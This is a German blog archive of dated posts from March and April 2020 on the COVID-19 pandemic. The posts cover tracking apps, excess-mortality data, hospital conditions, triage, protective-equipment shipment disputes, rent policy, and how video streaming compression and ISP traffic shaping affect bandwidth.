Ein Volk von Cookie-Akzeptierern, Instagram-Postern und Werbetracking-Zustimmern, 50 Millionen Bürger, die widerspruchslos und freiwillig intimste Daten über ihr gesamtes Sozial-, Arbeits-, Reise- und Beziehungsverhalten an internationale Datenkonzerne senden, geraten in Überwachungsstaat-Panik angesichts der Frage, ob man gegen eine hochinfektiöse tödliche Lungenkrankheit möglicherweise eine (freiwillige!) Tracking-App einsetzen soll. Diese Menschen kaufen pro Jahr 25 Millionen Smartphones und Navigationsgeräte, für deren Nutzung durchweg Ortungsdienste aktiviert werden, und klicken bedenkenlos «Ja» bei jeder ungelesenen Kenntnisnahmeerklärung unter AGB und Datenschutz-Disclaimern.
Das Argument haben wir schon mehrfach gehört, aber noch nie so schön formuliert :-)
Wo wir gerade bei Mobilfunkdatennutzung waren: Der CCC hat da mal 10 Kriterien formuliert, die sie an entsprechende Datenverarbeitung anlegen würden. Ich habe da nicht mitgearbeitet, aber ich stimme ihnen inhaltlich zu. Was sie da sagen, was technisch geht, das geht technisch. Und daher ist es auch nicht überzogen, zu verlangen, dass das als Mindeststandard so gemacht werden könnte. Bleibt die Frage, ob die Daten auch dann noch nützlich wären, wenn das Opt-In ist (und potentiell niemand freiwillig mitmacht). Für so statistische Aussagen reicht das, wenn man eine kleine Teilmenge der Bevölkerung hat, aber Tracking von Infizierten ist vermutlich erst dann nützlich, wenn die Infizierten auch alle mitmachen. Trotzreaktionen von Infizierten gab es aber jetzt schon vereinzelt.
Auf der anderen Seite braucht man vielleicht Tracking einzelner Infizierter gar nicht.
[l] Ich kriege gerade zu beiden Seiten der Corona-Pandemie wütende Mails. Die wütenderen kommen ganz klar von der "ist alles Bullshit"-Fraktion, die das für einen Hype halten, oder einen Plot der Pharmamafia, oder vielleicht ist das die New World Order, die uns plattmacht, weil wir der Wahrheit zu nahe gekommen sind. Oder es ist der Cash-Out der Bankster und wir sollten alle Gold kaufen. *gähn*
Hier mal ein Leserbrief in die Gegenrichtung. Er bezieht sich auf den Peira-Artikel von Ellis Huber, den Maha empfohlen hatte.
Treten wir einfach einen Schritt zurück und betrachten die Situation im Januar. Da haben alle Experten gesagt: Naja Corona wird völlig überschätzt Grippe bringt viel mehr Leute um.
Das hat die Presse gesagt, das haben Experten gesagt das haben Ärzte gesagt.
Hier ist ein Tweet von Nassim Nicholas Taleb:
https://twitter.com/nntaleb/status/1220064979795181573
Hier macht er sich über diese Sichtweise lustig.
Warum hatte Taleb eine andere Meinung?
Der Grund war nicht eine bessere Prognose. Taleb hat nicht richtig vorhergesagt, dass C-19 eskalieren wird. Die Überlegung war bei diesem Wachstumsverhalten ist C-19 ein Risiko. Dieses Wachstum kann dazu führen, dass viele Systeme völlig überlastet sind was mit noch viel größeren Probleme einhergeht.
Warum hinkt der Vergleich mit den Grippetoten?
Wir wissen wie die Grippe sich verhält und deswegen wissen wir, dass die Grippe nur ein kleines systemisches Risiko hat. Bei C-19 wussten wir nicht wie es sich verhält und konnten deswegen nicht ein systemisches Risiko ausschließen. Die Millionen die wir im Januar nicht für Kontrollen und abgesagt Flüge ausgeben wollten bezahlen wir im Februar mit Milliarden und im März mit Billionen und im April mit Trillionen. Aufgrund dieses explosiven Verhaltens, hätte man im Januar die richtige Risikoabschätzung treffen müssen.
Hubers verweis auf Übersterblichkeit:
"Die aktuellen Daten aus Italien zeigen nicht, wie hoch die Infektionsraten mit SARS-CoV-2 tatsächlich sind und ob die täglichen Sterbefälle im ganzen Land jetzt bei 2.500 liegen, das Coronavirus also im Vergleich zu den sonstigen tödlichen Krankheiten tatsächlich viele zusätzliche Fälle produziert. Wissenschaftler sprechen von Übersterblichkeit, wenn in einem Jahr überdurchschnittliche Todeszahlen durch eine neue Krankheit zu verzeichnen sind. Nach den Zuständen in einigen Krankenhäusern in Norditalien ist davon auszugehen, dass es regional eine hohe Übersterblichkeit und dort sogar eine Verdoppelung und Verdreifachung der täglichen Todesfälle gibt. Jetzt tritt langsam ein Rückgang der bisher täglichen Infektions- und Sterbezahlen ein. Der Europäische Sterblichkeitsbericht des EuroMOMO Projektes, an dem 24 europäische Länder beteiligt sind, verzeichnete Ende März 2020 einen Anstieg der Sterbefälle in Italien und in Spanien, der aber unter den Anstiegen früherer Grippewellen liegt. In den anderen Ländern ist noch keine erhöhte Sterblichkeit zu erkennen."
Euromomo sammelt Daten auf Nuts2 Ebene. Das ist ungefähr Städteniveau. Die Daten für fast den kompletten März sind Vorhersagen des Algorithmus. Zu erkennen an der blauen Linie. Der Algorithmus von Euromomo ist dafür ausgelegt, Daten zu extrapolieren. Wenn Italien typischerweise Daten nachkorrigieren muss, dann versucht die blaue Linie das zu korrigieren. Der Algorithmus extrapoliert bei nicht vorhandensein von Daten als auch wenn Daten unvollständig sind und typischerweise nachgebessert werden.
Das heißt wir wissen die Übersterblichkeit in Italien aufgrund der Euromomo Daten noch nicht.
Das nächste Problem ist, dass uns eigentlich die Übersterblichkeit in der Lombardei interessieren sollte und nicht in Italien. Es gibt jetzt schon Hinweise, dass in der Lombardei die Übersterblichkeit viel größer ist als von den Covid zahlen ausgedrückt.
Das heißt hier wird schon wieder der gleiche Fehler gemacht, der im Januar auch gemacht wurde: "Ach naja, die Daten könnten auch die Sterblichkeit verzerren, deswegen wirds nicht so schlimm sein." und es ist genau das Gegenteil passiert. In der Lombardei sieht es so aus, als sei die Sterblichkeit noch wesentlich größer als angenommen.
Die Mechanismen sind nun mal so, dass wir nicht warten können, bis die ECHTE Übersterblichkeit gemessen wurde. Leichen auf der Straße sollten Indikator genug sein.
Der Huber benutzt eine Extrapolation und verkauft Sie uns als Daten und macht noch zusätzlich den gleichen Fehler den viele Experten gemacht haben. Bei der Grippe, wissen wir die Risikoverteilungen, bei C19 wissen wir sie nicht.
Mir ist noch aufgefallen, dass hier ein ähnliches Denkmuster wie bei der Klimakatastrophe auftritt. In beiden Fällen war vorher weitgehend klar, wie sich das entwickeln würde, aber die Menschen wollten die Katastrophe nicht glauben und lieber warten, bis die Zahlen "belastbarer" werden. Die Zahlen haben sich dann bestätigt oder waren in Teilen sogar noch schlimmer als vorhergesagt. Und dann gucken sich alle wie die Llamas gegenseitig an und wundern sich, wie es die Leute vor ihnen so weit kommen lassen konnten.
Ich glaube, dass die gefühlte Gewissheit der Prognose im Kopf eine Art kontraproduktives Gefühl auslöst. Entweder "ok es kümmert sich jemand" oder vielleicht "da kann man eh nichts mehr machen, wenn die schon die Zahlen kennen".
Vielleicht brauchen wir da eine neue Herangehensweise.
Übrigens: Besonders geil finde ich ja die Bill-Gates-Hasser gerade. Die schreiben mir, der Bill Gates habe sich mal geäußert, dass er das Überbevölkerungsproblem dadurch lösen will, dass er sanitäre Verhältnisse stärkt, Krankheiten bekämpft und Verhütungsmittel verteilt. Damit ist Bill Gates ganz offensichtlich sowas wie ein neuer Mengele, der Milliarden von Menschen umbringen will. Das scheint auch so ein Reflex zu sein im Menschen, in Krisenzeiten einen Sündenbock zu suchen, auf den man zeigen kann.
Weiß eigentlich schon jemand, wie George Soros uns diese Pandemie eingebrockt hat?
Oh und Bill Gates' Stiftung ist böse, weil sie Profit erwirtschaftet, den sie dann verteilt. Und nicht ihr Stiftungsvermögen verteilt. Ich spoiler mal: Das ist genau der Unterschied zwischen Stiftung und Spende. Eine Spende verteilst du und dann ist sie weg. Eine Stiftung richtest du ein, damit sie auch zukünftig noch Spenden verteilen kann. Sogar wenn du schon tot bist.
Update: Vielleicht ist dem einen oder anderen das ja nicht klar: Wenn man in Ländern den Lebensstandard erhöht, sinkt die Geburtenrate. Bis hin zum Extrem in Japan und Europa, wo die Bevölkerungszahl sogar sinkt. Was Bill Gates da vorschlägt ist also nicht nur humanitär sondern auch intelligent und der offensichtlichste Weg zur nachhaltigen Bewirtschaftung des Planeten. Den Wohlstand besser verteilen, damit wir nicht immer mehr Menschen kriegen, die immer mehr Ressourcen verbrauchen. Und man müsste natürlich dann auch den Reichen ihre Verschwendungssucht einschränken und sie in ihrer Mobilität einschränken. Der Teil wird gerne übersehen. Immer nach Mallorca fliegen und jede Familie 1-2 Autos geht nicht.
Update: Ein Leser hat den passenden xkcd gefunden (zu meinem Klimawandel-Vergleich).
Update: "Orbán: Ausländer und George Soros brachten Corona nach Ungarn". m(
[l] Mein Kumpel Maha sendet mir gerade eine Familienpackung Lesestoff für die darbenden Corona-Isolierten da draußen:
ich habe im Nachgang zum Congress mal einen kleinen Artikel über Framing auf peira.org veröffentlicht:
https://www.peira.org/framing-aktuelle-beispiele-aus-der-sprache-der-politik/
Ich beginne mit meiner Bemerkung über Klimawandel/Klimakatastrophe, die du vom Congress kennst, aber vielleicht findest du das eine oder andere weitere Beispiel erhellend.
Der Artikel ist von der Startseite inzwischen weg, weil es Peira gelungen ist, einen sehr informativen Beitrag zu Corona von Dr. Ellis E. Huber einzuwerben, der ohne Verharmlosung die Corona-Zahlen in ein Verhältnis zu den sonstigen epidemiologischen Zahlen stellt. Die Schlussfolgerungen sind da immer kursiv gesetzt, so dass du ihn schnell lesen kannst, hier der direkte Link:
https://www.peira.org/das-virus-die-menschen-und-das-leben/
Er hat auch eine Podcastfolge über Online-Lehre gemacht, die gerade wahrscheinlich für viele von Interesse sein wird. Viel Spaß!
Update: Hmm der Link zum Podcast kam schon falsch rein. Er meinte glaube ich den hier.

Mon Apr 6 2020

[l] Die Briten haben gerade wenig Glück mit ihren Bestellungen in China.
Erst haben sie ein paar Millionen Covid-Antibody-Tests geordert, und die funktionieren jetzt gar nicht. Immerhin kam die Lieferung mit den Beatmungsgeräten an m(
Was haben die da gemacht? Den Azubi bei Alibaba herumklicken lassen?!

Fri Apr 3 2020

[l] Die echten Freunde erkennt man ja am besten in Notlagen, wenn es einem mal nicht so gut geht. Noch besser: Wenn es dem Freund auch nicht so gut geht. Dann merkst du, wer wirklich zu dir hält.
Aktuell: Die Amis kaufen in China eine Atemmaskenbestellung der Franzosen weg. Die stand schon auf dem Flughafen auf der Landebahn. Die Amis haben einfach mehr Geld geboten, und da haben die Chinesen gesagt: Mehr hilft mehr!
Haha, denkt ihr euch jetzt vielleicht, die Franzosen! Das haben die sich selbst zuzuschreiben! So wie der Macron immer gegen die Nato gestichelt hat, und wie er den Trump mit seinem festen Händedruck nassgemacht hat!
Oh, warte, geht noch weiter, die Meldung.
USA pullen denselben Stunt mit einer Lieferung für Berlin.
Eine vom Land Berlin in China bestellte Lieferung von Schutzausrüstung soll von den USA abgefangen und in die Vereinigten Staaten umgeleitet worden sein. Das erfuhr der Tagesspiegel aus Berliner Sicherheitskreisen.
Berlin hatte bei dem Hersteller Atemschutzmasken mit den Schutzklassen FFP2 und FFP3 bestellt, die Einsatzkräfte und Pflegepersonal vor Ansteckung mit dem Coronavirus schützen. Es soll sich um eine US-amerikanische Firma handeln, die in China produziert.
Ja gut, das ist ja auch eine bekloppte Konstellation. Nachdem Deutschland der Schweiz Masken aus Eigenbedarfsgründen nicht exportiert hat, können wir jetzt auch keinen auf dicke Hose machen, wenn die Amis das mit uns machen.
Das ist halt der Nachteil, wenn man keine Ethik und keine Prinzipien hat.
Update: Es gibt ein Update zur Berliner Bestellung. Die war für die Polizei, aber nicht bei einem US-amerikanischen Hersteller bestellt sondern bei einem deutschen Fachhandel bestellt und offenbar auch schon bezahlt. Abhandengekommen sind die auch nicht in China sondern in Bangkok.

Thu Apr 2 2020

[l] Leserbrief aus einem Krankenhaus:
meine Freundin arbeitet im Krankenhaus mit Schlaganfall Patienten. Was sie erzählt vom Gerangel zwischen Ärzten und Verwaltung ist haarsträubend.
Problem ist, dass die Kassen heute nach Komplextarifen abrechnen und dass bei Ausfall von darin vereinbarten Leistungen ganz schnell riesige Löcher im Budget entstehen. Daher wurden potentielle Coronafälle lange nicht als solche dokumentier. Gleichzeitig bekommen Mitarbeiter zwar von den Chefärzten die Anweisung, sich zu schützen (bei fehlenden Mundschutzen sowieso schon schwierig) aber von der Verwaltung gleichzeitig unter Androhung von Disziplinarmaßnahmen verboten, eigenen Mundschutz zu tragen.
Zitat: „Damit das hier nicht so nach Seuche aussieht.“
In ihrem Krankenhaus geht es jetzt erst langsam so richtig los, auch wenn schon Pfleger erkrankt sind (denen z.T. vom dafür zuständigen Hausarzt erst tagelang die Test-Kits verweigert wurden!!!).
Viele Mitarbeiter im Krankenhaus sind ja heute outgesourced und werden dem Krankenhaus von Praxen „ausgeliehen“. Das sind dann hochqualifizierte Billigkräfte, die von flexiblen Verträgen, anteilig auf Stundenbasis abgerechnet, abhängig sind. Diesen quasi externen Mitarbeitern wurde mitgeteilt, dass sie, falls sie sich wegen der absurden Zustände an die Presse oder an Leute wie Dich wenden, direkt ihren Job verlieren werden.
Auf der untersten Ebene, in den Krankenhäusern, ist also einiges selbst gemacht. Da bricht jetzt viel auf von dem, was schon ohne Pandemie unerträglich war. Und von innen weiß niemand, wie ernst gemeint die Vorgaben sind, weil sie voll an der Realität vorbei gehen und innerhalb des Systems so nicht umsetzbar erscheinen.
Als indirekt Betroffener schwanke ich daher bezüglich der Gesamtlage in diesen Tagen immer zwischen dem Bemühen um Gelassenheit und einem angemessenen alarmiert sein. Für beides hab ich je einen Link, beide finde ich unbedingt beachtenswert. Wir müssen als Gesellschaft den Ausgleich zwischen beidem finden. Wie immer also.
Also, falls Du sie nicht schon nicht gesehen hast:
Hier der Virologe, der von sich behauptet, mehr Corona-Patienten gesehen zu haben als irgendjemand sonst in Deutschland. Er war in Heinsberg lange Türklinken putzen und hält daher nach eigenen Erfahrungen z.B. das Ansteckungsrisiko per Oberflächen für überschätzt. Auf Türklinken in Haushalten mit mehreren Coronainfizierten habe er jedenfalls keine Belastung gefunden. Streeck heißt der Mann. Er erzählt bei Lanz auch davon, dass das RKI keine eigenen Studien plant oder andenkt, die für realistischere Handlungsanweisungen an Gesundheitswesen und Bevölkerung aber unbedingt nötig wären. Deswegen macht er das jetzt.
Und hier ist ein Video vom Kanal Medlife Crisis. Da lädt ein britischer Herzchirurg in Nachtschichten immer wieder mal was lustiges hoch. Er ist wohl schon selbst durch mit Corona, räumt aber mit dem Missverständnis auf, es seien nur Alte betroffen. Bei der normalen Lungenentzündung sei der Altersdurchschnitt derer, die Intensivmedizin mit Beatmung brauchen bei 74 Jahren, bei Corona sei er bei 60 Jahren. Überdies überleben aus der gleichen Gruppe bei der Lungenentzündung gut 3/4 der Patienten. Bei Corona nur etwa die Hälfte derer, die Beatmung brauchen.

Sat Mar 28 2020

[l] Kurze Durchsage der Bundesregierung:
Viele Geschäfte sind derzeit auf Behördenanweisung geschlossen. Einige große Handelsketten wie Adidas oder Deichmann wollen deshalb keine Miete mehr zahlen. "Unanständig" und "unsoldidarisch" sei das, meint die Bundesregierung.
Ich weiß ja nicht, wie es euch geht, aber wenn ich "unanständig und unsolidarisch" höre, dann muss ich spontan an die Privatisierung des Gesundheitssektors denken, an Hartz IV und an den Mindestlohn.
Und an die himmelschreiende Inkompetenz des Miet-Handlings gerade. Die sagen einfach:
"Mieter müssen selbstverständlich ihre Miete zahlen. Falls sie tatsächlich infolge der Krise in ernsthafte Zahlungsschwierigkeiten geraten, kann ihnen lediglich für einen begrenzten Zeitraum nicht gekündigt werden", stellte die SPD-Politikerin klar.
Ja gut, you had me at "SPD-Politikerin" m(
Wie immer bei denen. Ideologie statt Nachdenken. Mieter sind gut, arm und unschuldig, Vermieter sind böse und gemein. Der Vermieter hat häufig das Mietshaus auf Pump gekauft und muss seine Hypotheken abzahlen. Was glauben die denn, was passiert, wenn man jetzt sagt: Du kannst den Mietern nicht kündigen, wenn sie nicht zahlen können? Dann schiebt man die Insolvenz von der linken Taschen in die rechte Tasche. Da müsste man mindestens sagen: Nichtgezahlte Mieten darf der Vermieter an die Bank durchreichen. Oder so. Zumindest als Härtefallregelung.
Ist das jetzt irgendwie gerechter, wenn die ganzen Läden pleitegehen? Wo arbeiten denn die ganzen Mieter, um deren Schutz es hier angeblich ging?
OK, mal als Gedankenspiel. Nehmen wir mal an, wir könnten es irgendwie schaffen, dass nur die Unternehmen oder Vermieter mit ausreichend Rücklagen belastet werden. Ist das dann gerecht? Dann bestrafen wir die, die ordentlich gewirtschaftet haben, und belohnen die Unternehmen, die mit ihren Profiten lieber Aktienrückkäufe gemacht habe.
Die tun immer alle so, als gäbe es hier einfache Lösungen! Pass uff, Atze, wir greifen einfach dem reichen Mann in die Tasche!!1! Ja super!
Wir können und sollten gerne mal langfristig darüber reden, wieso es eigentlich Leute gibt, die von ihrem Besitz leben können, statt von ihrer Arbeit wie alle anderen. Das finde ich nämlich grundsätzlich unanständig und unsolidarisch, dass das möglich ist. Bei Hartz-IV greifen sie noch dem nackten Mann in die Tasche, und faseln was von "die müssen halt was leisten, wenn sie Geld kriegen wollen", aber daneben stehen Leute, die alleine von ihren Ländereien und Aktienportfolios leben können, von ihren Mietshäusern (die gibt es auch, die Vermieter, die ihre Hypotheken abgezahlt haben), von ihren Patenten. Das sollte man mal grundsätzlich abschaffen. Oder für alle so machen und ein bedingungsloses Grundeinkommen auszahlen.

Thu Mar 26 2020

[l] So, nach gefühlt acht Wochen Quarantäne kann man ja mal langsam vorsichtig ein paar Fragen stellen. Italien hat sehr viel alte Menschen, ja, aber Japan hat noch mehr. Wieso ist Japan nicht von einem Coronatsunami plattgemacht worden?
Letzte Woche hörten wir, die Schweden verhielten sich unvernünftig und machten gar keine Ausgangssperre. Wieso ist da nicht Blut in den Straßen?
Haben die ganzen Skeptiker Recht gehabt?
Ich bin gespannt auf die Auswertung.
Allerdings, egal wie das ausgeht, bitte ich von Schuldzuweisungen abzusehen. Bei einer Pandemie mit einem neuen, unbekannten Erreger ist es mir immer lieber, wenn die Politik ein bisschen überreagiert, als wenn sie ihre Bürger sterben lässt. Und selbst wenn nichts war, ist es doch gut, einmal pro Generation eine Pandemie-Reaktion durchgespielt zu haben.
[l] Leserbrief zur Triage:
Ich fahre seit 20+ Jahren ehrenamtlich als Sani bei [Organisation] Krankentransport und Rettung. Kenne daher das System dort recht gut, und hab schon einiges erlebt. Und zumindest in [Stadt] ist es so, dass schon seit Jahren aussichtslose Fälle von Pneumonie bei betagten Menschen nicht mehr auf der Intensivstation landen. Deswegen sind die von Dir erwähnten Guidelines NICHT grundsätzlich neu, oder Corona-spezifisch.
Das wird in [Stadt] nicht gemacht, weil [die Zuständigen] ein Haufen herzloser Pfennigfuchser ist, die lebensbedrohlich erkrankten Senioren die ICU nicht gönnen. Sondern weil bei einer schweren Pneumonie im hohem Alter und bei von Haus aus schlechtem Allgemeinzustand (! - es gibt keine Altersgrenze, das wird individuell angeschaut!) die Reise sowieso praktisch sicher nach oben geht. Egal ob vorher auf der Intensivstation ein Zwischenhalt eingelegt wurde, oder nicht. Und ganz hart gesagt: auf einer Betreuungsstation stirbt es sich deutlich "schöner", als auf der ICU. ICU ist hoch invasiv, Intubation, x Zugänge gelegt, riesen Zirkus, Apparate… das nicht automatisch jedem Patienten anzutun ist keine Geldfrage. Diese für den Patienten extrem belastende (!) Maschinerie setzt man nur dann in Gang, wenn es auch absehbar einen Sinn hat.
Was jedenfalls natürlich immer gemacht wird ist Gabe von Flüssigkeit, Schmerzmittel, sonstige pflegerische Betreuung. Man kümmert sich natürlich um die Patienten, auf einem hohen Niveau. Aber man gibt sich eben nicht der Illusion hin, dass da noch allzu viel zu machen wäre.
Falls sich der Zustand so eines solchen Patienten wider alles Erwarten doch bessern sollte, wird er natürlich innerhalb des Spitals wieder in die Betreuung verschoben, die auf Heilung ausgerichtet ist (statt Betreuung und Abwarten).
Wie gesagt, das ist in [Stadt] schon seit Jahren mehr oder weniger Standard - aber höchst inoffiziell, weil das ein Tabuthema ist. Es spricht aber meiner Meinung nach sehr für die Verantwortlichen, dass das so gelöst worden ist. Niemand ist gedient, wenn ein Patient mit Überlebenswahrscheinlichkeit nahe Null kurz vor seinem Hinscheiden noch mit Intubation und x anderen höchst mühsamen Maßnahmen gequält wird.

Sat Mar 21 2020

[l] Im Saarland hat jetzt ein ganzes Krankenhaus bis auf die Notaufnahme zugemacht, weil sich so viele Mitarbeiter mit dem Coronavirus angesteckt haben. (Danke, Michael)
[l] Eine kurze Sache noch zu Netflix und co. Video wird komprimiert übertragen und gespeichert. Das funktioniert grob so, dass der Codec das nächste Bild vorhersagt, nach einem genormten Verfahren, und dann nur noch die Differenzen zwischen Vorhersage und Realität überträgt. Wenn sich im Bild nicht viel ändert, müssen für ein Video auch so gut wie keine Daten übertragen werden.
Der Effekt ist, dass Videokonferenzsysteme, wenn sie nicht von völlig inkompetenten Vollpfosten implementiert wurden, mit einer Größenordnung weniger Datenübertragung auskommen als ein Hollywood-Actionfilm oder gar ein gestreamtes Videospiel. Dieser Effekt macht so grob einen Faktor von 10 aus.
Es gibt allerdings auch einen Gegeneffekt. Videokompression kostet viel Rechenzeit. Wenn man mehr Rechenpower aufwendet, kriegt man effektivere Kompression. Bei Plattformen wie Netflix und Youtube lohnt es sich daher, einmalig in maximale Kompressionseffizienz zu investieren, weil man ja deutlich mehr ausstrahlt als man reinkriegt. Netflix und Youtube haben daher schon auf AV1 gesetzt, als das noch weit von Echtzeit-Kompressionsfähigkeit entfernt war. Heutzutage haben Grafikkarten auch Videokompressions-Hardware an Bord, aber die braucht für die gleiche Qualität im Allgemeinen deutlich mehr Bits als wenn man das in Software macht. Videokonferenzsysteme und Twitch-Streaming brauchen daher wegen ihrer Echtzeit-Anforderungen mehr Bandbreite. Dieser Effekt macht so grob einen Faktor von 2 aus.
Ein dritter Effekt hat wieder Vorteile für Filme statt Streaming: Für die Vorhersage überträgt man ein Standbild "aus der Zukunft", anhand dessen dann die Bilder dazwischen besser vorhergesagt werden können. Die Übertragung eines Standbildes kostet um die Faktor 100 so viele Daten wie die interpolierten Bilder zwischen Standbildern. Bei Konferenzen und Echtzeit-Streaming ala Twitch hat man keine Bilder aus der Zukunft, daher packt man auf den ganzen Stream ein bisschen Latenz. Aber nicht viel, denn das soll ja Echtzeit sein. Daher greift man nicht weit in die Zukunft und muss daher häufiger Standbilder übertragen. Bei undynamischem Content wie einer Telefonkonferenz kann das so Faktor 2 Bandbreitenbedarf ausmachen. Bei hochdynamischem Content wie einem Videospiel ist es eh egal, weil sich zwischen den Frames so viel ändert, dass man eh nicht so gut interpolieren kann.
Effekt 2 und 3 werden mehr als ausgeglichen durch den ersten Effekt, weil sich in Videokonferenzen im Allgemeinen kaum jemand bewegt und sich das daher super komprimieren lässt.
Wenn es jetzt also tatsächlich Knappheit im Internet gäbe (und nicht nur innerhalb der Netze von Kapitalisten-ISPs, die nie was in Netzausbau investiert haben), und man eine Stellschraube drehen wollen würde, dann sollte man lieber bei Twitch und co drosseln als bei Youtube und Netflix. Die arbeiten jetzt schon sehr nahe am technisch machbaren. Und man könnte Streamer aufrufen, nicht so rumzuwackeln :-)
Update: Was auch super gut komprimiert sind Vorträge, außer wenn der Kameraengel auf Speed war und die ganze Zeit die Kamera umschaltet und herumzoomt. Ihr könntet also die Zeit gerade gut nutzen, um euch mal die ganzen alten Kongressvideos vom CCC reinzuziehen. Weil solcher Content gut komprimiert müsst ihr euch auch kein schlechtes Gewissen machen, zuviel Bandbreite verschwendet zu haben.
Update: Noch ein paar Details. Man kann die Qualität der Standbilder runterdrehen, um Bandbreite zu sparen. Die Details kann man dann mit den Interpolations-Frames nachliefern. Der Effekt ist etwas, das ihr bestimmt schon mal bei einem Livestream gesehen habt: So ein "pumpen" der Qualität. Man kriegt immer ein total verwaschenes Bild und das wird dann rapide besser aufgelöst. Das macht niemand freiwillig, sondern das passiert, wenn man Codecs im Fernsehmodus betreibt. Fernsehen wird traditionell über Transponder in Satelliten gemacht, und jeder Kanal hat eine bestimmte Bandbreite. Die darf dann aber auch nicht überschritten werden. Daher waren die ersten Codecs auch alle auf eine fixe Bandbreite ausgelegt. So machen das aber heute weder Videokonferenzen noch Youtube noch Twitch. Im Internet überträgt man halt mehr Daten, wenn die Szene mehr Bandbreite braucht. Beim Digitalfernsehen teilen sich mehrere Kanäle einen Transponder. Die erste Gammelhardware hat dann halt jedem Kanal ein festes Stück Bandbreite gegeben, auch wenn auf Kanal 1 ein Testbild lief und auf Kanal 2 ein Actionfilm. Das ist heute nicht mehr so.
Update: Oh einen noch. Firefox und Chrome haben keinen Support für H.265 eingebaut. Das ist einer der Gründe, wieso es von Netflix unter Windows eine App gibt. Die kann dann H.265 verwenden und kommt mit weniger Bandbreite aus. Jedenfalls war das immer so. Jetzt rollt Netflix gerade AV1 aus, was auch Chrome und Firefox können. Damit wäre der Vorteil der App dann dahin.
Update: Ach du je, Twitch empfiehlt ernsthaft ihren Streamern konstante Bitrate. Der Hintergrund wird sein, dass sie keine Bandbreiten-Peaks haben wollen, wenn das Spiel hektisch wird. Aber das heißt, dass alle anderen Streams völlig sinnlos Bandbreite verplempern. Ich nehme also meine Aussage von oben bezüglich Twitch zurück und empfehle die Schließung von Twitch statt der Drosselung von Youtube und Netflix. Was für Pfeifen.

Fri Mar 20 2020

[l] Die Schweiz scheint gerade ihre Corona-Response großflächig zu verkacken :-(
Highlights:
Seitdem die Neuinfektionen am vergangenen Wochenende ihren Höhepunkt erreicht haben, ist das BAG mit der Erfassung der Fallzahlen im permanenten Verzug. Schätzungen werden gemacht, indem Papierstapel von Formularen auf eine Waage gelegt werden.
Statt übers eigene Meldesystem erfuhren BAG-Mitarbeitende bis vor kurzem in vielen Fällen erst durch die Presse oder über die Online-Enzyklopädie Wikipedia von Todesfällen oder von geheilten Patienten.
Heilige Scheiße! Liebe Schweizer: Bleibt drinnen! Und bleibt gesund!
[l] Infrastrukturapokalypse: Netflix dreht die Streaming-Bandbreite in Europa runter. Nicht weil es nötig wäre, sondern weil ein uninformierter EU-Kommissar deren CEO angepault und Panik geschoben hat.
Kurze Erklärung, wie Netflix funktioniert. Die stellen ihre Video-Server bei eurem ISP auf. Wenn ihr Netflix guckt, dann kommt das nicht von Übersee, im Allgemeinen nicht mal von jenseits des DE-CIX, sondern aus dem fucking Netz eures fucking ISPs. Die einzige Infrastruktur, die da also überlastet sein könnte, wäre die des ISP. Und wisst ihr, was passiert, wenn Netzinfrastruktur überlastet ist? Dann werden Pakete gedroppt. Und wisst ihr, wer das sofort merkt? Euer Client. Und der holt sich dann automatisch die nächstkleinere Auflösung, weil er annimmt, DASS DIE FUCKING INFRASTRUKTUR ÜBERLASTET IST.
Noch nicht überzeugt? Euer ISP kann selbstredend auch Traffic künstlich runterpriorisieren. Das nennt sich Traffic Shaping. Einfach Netflix und Youtube runterdrehen. Wisst ihr, woran ihr erkennt, dass sie das machen? tagesschau.de flutscht noch, aber euer Youtube ruckelt. Oder noch besser: Gar nichts ruckelt.
Es gab hier keinen Handlungsbedarf. Die EU hat Netflix kaputtgemacht.
Im Übrigen sei der Hinweis erlaubt, dass Netflix einer der technisch besten Streaming-Anbieter ist, wenn es um schonende Bandbreitennutzung geht. Amazon streamt z.B. deutlich verschwenderischer. Daran könnt ihr sehen, dass es hier nicht um die Sache ging, sondern ein EU-Fuzzy wollte gerne beim Handeln gesehen werden. Leadership!!1!
Update: Nach Netflix jetzt auch Youtube. Für die gilt alles oben gesagte ebenfalls.
Update: Kurze Anmerkung noch dazu: Auch wenn die Netzneutralitätsleute das nicht gerne hören: Traffic Shaping ist ganz normal. Geht mal davon aus, dass euer Internet auch Traffic Shaping macht. Und zwar nicht nur euer ISP, auch euer Plasterouter. Denn wenn der Plasterouter das nicht machen würde, dann würde bei euch bei jedem Upload gar nichts mehr gehen. Verbindungen sind im Internet paketbasiert. Wenn du was downloadest, schickt dir die Gegenseite immer ein großes Paket mit dem nächsten Datenhappen, und dann schickst du der Gegenseite ein kleines "ist angekommen"-Paket. Weil die Internetprovider kapitalistische Schweinebacken sind, haben sie euer DSL genau so ausgelegt, dass vom Internet zu euch hin die Bandbreite dick ist, und von euch zum Internet hin ist sie dünn. So dünn, dass es genau reicht, um für einen die Leitung auslastenden Speed-Test alle "ist angekommen"-Pakete rauszuschicken. Warum erzähle ich das? Ohne Traffic Shaping würde ein Upload euer Internet komplett zum Erliegen bringen, weil die kleinen "ist angekommen"-Pakete nicht mehr oder nur stark verspätet rausgehen würden. Daher machen alle Plasterouter Traffic Shaping und priorisieren die "ist angekommen"-Pakete. Die heißen übrigens ACK.
Trafficpriorisierung funktioniert in der Praxis gerne so, dass lange Bulk-Verbindungen (Downloads, Backups) die kleinste Priorität kriegen, dann Streaming-Dienste, dann Videokonferenzen und Fernwartung, dann DNS und interaktive Dienste wie SSH und die höchste Priorität haben ACKs.
Wer sich für die Details interessiert, wie man sowas unter Linux selbst konfiguriert: Die Referenzdokumentation von Bert Hubert.

Tue Mar 10 2020

[l] Kennt ihr den schon?
Die Schweiz bestellt Schutzhandschuhe für ihre Ärzte. In China. Weil die Schweiz keinen Hafen hat, kommt die Lieferung über Deutschland.
Deutschland lässt jetzt den Container nicht durch.
Öh ... warum? Na weil der gute Herr Spahn seinen Job nicht gemacht hat und jetzt halt die Atemmasken und Schutzhandschuhe unseren Nachbarn klaut!
Gut, in einer Sache hat er Recht. Wir werden alle Atemmasken und Schutzhandschuhe brauchen. Ich weiß aus zuverlässiger Quelle, dass die Schweiz sich gerade nicht gegen das Coronavirus wehren kann. Die ganzen infizierten Schweizer müssen wir dann ja irgendwie abwehren!!1!
Unglaublich!
Der deutsche Exportstopp stützt sich auf eine Anordnung, die am 4. März vom deutschen Wirtschaftsministerium erlassen wurde. Das vierseitige Dekret untersagt jegliche Ausfuhr von Schutzbrillen, Masken, Schutzanzügen und weiterem Schutzmaterial in andere EU-Länder oder Drittstaaten. Es gehe darum, den «lebenswichtigen Bedarf» in Deutschland selber sicherzustellen, heisst es in der Anordnung. Der Exportstopp trifft die Schweiz besonders hart, weil sie fast alles medizinische Schutzmaterial importiert.
